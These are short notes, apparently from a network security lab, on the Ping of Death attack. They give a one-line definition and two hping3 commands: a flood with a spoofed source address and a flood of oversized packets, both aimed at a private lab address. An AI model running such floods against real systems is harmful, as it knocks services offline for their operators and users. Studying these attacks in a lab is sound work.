Ping of Death

In a Ping of Death (PoD) attack, an attacker attempts to crash, destabilize, or freeze the target system or service by sending malformed or oversized packets using a simple ping command

Using hping3

hping3 -S 192.168.60.130 -a 192.168.60.135 -p 21 --flood
sudo hping3 -d 65538 -S -p 21 --flood 192.168.60.130